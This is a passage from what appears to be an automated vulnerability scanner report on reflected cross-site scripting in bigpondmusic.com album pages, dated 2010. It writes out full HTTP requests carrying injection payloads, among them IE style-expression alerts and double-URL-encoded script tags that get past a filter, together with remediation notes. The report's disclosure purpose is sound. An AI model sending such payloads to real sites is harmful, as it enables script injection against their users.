Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album8ea10'%3b746216d7018/cheryl-cole/promise-this2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:24:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 was submitted in the h parameter. This input was echoed as 36267"style="x:expression(alert(1))"89a1f9e1cf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/cheryl-cole/promise-this2?h=76639449836267"style%3d"x%3aexpression(alert(1))"89a1f9e1cf8 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111361
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.37. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/cheryl-cole/promise-this2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9888f"style="x:expression(alert(1))"97f64925c9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/cheryl-cole/promise-this2?9888f"style%3d"x%3aexpression(alert(1))"97f64925c9b=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:24:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 111424
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5 was submitted in the REST URL parameter 1. This input was echoed as 5f944"><script>alert(1)</script>a5d020ae3d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album5f944%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d020ae3d5/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88521
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fac8e'%3b464820d9d25 was submitted in the REST URL parameter 1. This input was echoed as fac8e';464820d9d25 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumfac8e'%3b464820d9d25/crowded-house/the-very-very-best-of-crowded-house HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88215
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b was submitted in the h parameter. This input was echoed as 54cb1"style="x:expression(alert(1))"deab3ae0b1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style%3d"x%3aexpression(alert(1))"deab3ae0b1b HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 150486
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Crowded House - The Very Ver ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?h=74570223754cb1"style="x:expression(alert(1))"deab3ae0b1b" /> ...[SNIP]...
2.41. http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82f6a"style="x:expression(alert(1))"0184eb381c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style%3d"x%3aexpression(alert(1))"0184eb381c7=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 150546
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Crowded House - The Very Ver ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/crowded-house/the-very-very-best-of-crowded-house?82f6a"style="x:expression(alert(1))"0184eb381c7=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4 was submitted in the REST URL parameter 1. This input was echoed as 7c305"><script>alert(1)</script>a89f56eddf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album7c305%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea89f56eddf4/enrique-iglesias/euphoria3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:23:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88022
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 397dc'%3b4e76ceeb81a was submitted in the REST URL parameter 1. This input was echoed as 397dc';4e76ceeb81a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album397dc'%3b4e76ceeb81a/enrique-iglesias/euphoria3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:23:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87862
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e was submitted in the h parameter. This input was echoed as f169e"style="x:expression(alert(1))"07c1ed7cd2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/enrique-iglesias/euphoria3?h=670210759f169e"style%3d"x%3aexpression(alert(1))"07c1ed7cd2e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 124160
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.45. http://bigpondmusic.com/album/enrique-iglesias/euphoria3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/enrique-iglesias/euphoria3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 330e0"style%3d"x%3aexpression(alert(1))"04885151f99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 330e0"style="x:expression(alert(1))"04885151f99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/enrique-iglesias/euphoria3?330e0"style%3d"x%3aexpression(alert(1))"04885151f99=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 124781
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b was submitted in the REST URL parameter 1. This input was echoed as 4e55c"><script>alert(1)</script>9e81b9f299b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album4e55c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e81b9f299b/far-east-movement/like-a-g6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88260
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f89c3'%3bd99db4e3abb was submitted in the REST URL parameter 1. This input was echoed as f89c3';d99db4e3abb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumf89c3'%3bd99db4e3abb/far-east-movement/like-a-g6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87845
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 was submitted in the h parameter. This input was echoed as 976ec"style="x:expression(alert(1))"4b08bf62004 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/far-east-movement/like-a-g6?h=744261064976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:24:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 97682
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Far East Movement - Like a G ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?h=744261064976ec"style="x:expression(alert(1))"4b08bf62004" /> ...[SNIP]...
2.49. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/far-east-movement/like-a-g6
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 878a2"style="x:expression(alert(1))"ab522009b4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
